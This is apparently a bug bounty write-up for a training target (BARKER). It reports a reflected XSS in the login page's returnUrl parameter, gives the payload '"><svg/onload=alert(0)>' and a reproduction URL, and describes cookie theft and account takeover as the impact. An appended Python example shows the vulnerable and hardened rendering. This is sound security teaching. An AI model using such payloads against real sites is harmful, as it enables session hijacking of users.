bugbountyhunter scope BARKER: First Blood, a Reflected XSS Report

Published by sec875 on 2024-08-01

https://www.bugbountyhunter.com

Report title: Reflected Cross-Site Scripting (XSS)
Endpoint: https://7b6ae0ae6c79-sec875.a.barker-social.com/login
Vulnerable parameter: returnUrl
Payload: https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F"><svg/onload=alert(0)>

Body
I have discovered a reflected XSS vulnerability affecting the endpoint 'login' in the parameter 'returnUrl'. The payload requires no filter bypass and is simply '"><svg/onload=alert(0)>'.

You can see a working proof of concept here:
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722451450/pb4gmhtotflfexb9h4v2.png)

To reproduce:
1. Go to the Barker app login page and discover the returnUrl parameter.
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722451853/oytimk1jhzvk2ujc1loe.png)
2. Visit https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F%22%3E%3Csvg/onload=alert(0)%3E
3. Observe that the XSS executes.

Payload used: "><svg/onload=alert(0)>. No filtering at all.
Vulnerable parameter: returnUrl
Endpoint/URL: https://7b6ae0ae6c79-sec875.a.barker-social.com/login

Impact:
As the session cookies are not protected by HttpOnly, we can obtain these and achieve account takeover. As well as this, the CSRF token is stored in the DOM, which enables us to easily perform actions on behalf of the user.
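The payload above works because the `"` closes an attribute value and the `>` closes the tag, so the `<svg>` lands in the page as real markup. The following added example (not code from the report or from BARKER; the `<input type="hidden">` template is an assumption about where returnUrl is reflected) shows that breakout beside the fix: attribute-encode the value, and additionally restrict returnUrl to a same-site relative path.

```python
# Added example (not from the original report): how the returnUrl reflection
# described above becomes XSS, and how to render the same value safely.
# The template shape is an assumption; BARKER's real markup is not on the page.
import html
from urllib.parse import urlsplit

# Constructed input: the report's payload, URL-decoded.
PAYLOAD = '/"><svg/onload=alert(0)>'


def render_login_vulnerable(return_url: str) -> str:
    """Interpolates the parameter straight into an attribute: the '"' in the
    payload closes the value, '>' closes the tag, and the <svg> is live HTML."""
    return f'<input type="hidden" name="returnUrl" value="{return_url}">'


def render_login_hardened(return_url: str) -> str:
    """Attribute-encodes the value (quote=True turns '"' into &quot;), so the
    browser sees a single attribute value and no new element."""
    return (
        '<input type="hidden" name="returnUrl" '
        f'value="{html.escape(return_url, quote=True)}">'
    )


def is_safe_return_url(return_url: str) -> bool:
    """Defence in depth: accept only a same-site relative path. Rejects a
    scheme or host (open redirect), protocol-relative '//', and any character
    that could break out of an attribute."""
    parts = urlsplit(return_url)
    if parts.scheme or parts.netloc:
        return False
    if not return_url.startswith("/") or return_url.startswith("//"):
        return False
    return all(ch.isalnum() or ch in "/-_.?=&%" for ch in return_url)


def injected_element_count(markup: str) -> int:
    """Crude check: count '<svg' occurrences present as real markup."""
    return markup.lower().count("<svg")


if __name__ == "__main__":
    print(render_login_vulnerable(PAYLOAD))   # contains a live <svg onload=...>
    print(render_login_hardened(PAYLOAD))     # contains only &quot;&gt;&lt;svg...
    print(is_safe_return_url(PAYLOAD), is_safe_return_url("/feed?page=2"))
```

The encoding fix alone closes the XSS; the allow-list on returnUrl is the extra check worth having on any post-login redirect parameter.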
